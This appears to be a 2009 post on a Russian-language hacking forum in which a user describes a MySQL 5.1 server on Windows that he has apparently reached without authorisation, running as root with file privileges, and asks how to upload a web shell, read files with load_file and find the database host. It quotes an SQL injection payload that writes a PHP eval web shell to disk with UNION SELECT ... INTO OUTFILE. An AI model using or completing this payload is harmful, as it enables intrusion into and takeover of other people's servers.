Показать сообщение отдельно

  #9849  
Старый 06.11.2009, 05:07
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
С нами: 9764446

Репутация: 123
По умолчанию

Всем привет.
Есть сервак со след параметрами

base:articles
ver:5.1.36-community
user:root@localhost
basedir:C:\Program Files\MySQL\MySQL Server 5.1\
datadir:C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
os:Win32
mysql.password:****
mysql.user:****
tmpdir:C:\WINDOWS\TEMP
file_priv:Y

Собственно интересна возможность заливки шелла.
Если есть статьи какие нибудь про load_file- накидайте ссылок (я ничего толкового не нашел). И еще интересует возможность использования
mysql.password:****
mysql.user:****
Где и как можно узнать хост на котором БД.

Сорри, если что-то не так понял и неправильно написал.


Зы
Цитата:
-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php'; --
Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php.
Я так понимаю это вот этот путь C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
?

Заранее спасибо. С меня +++ за помощь.
 
Ответить с цитированием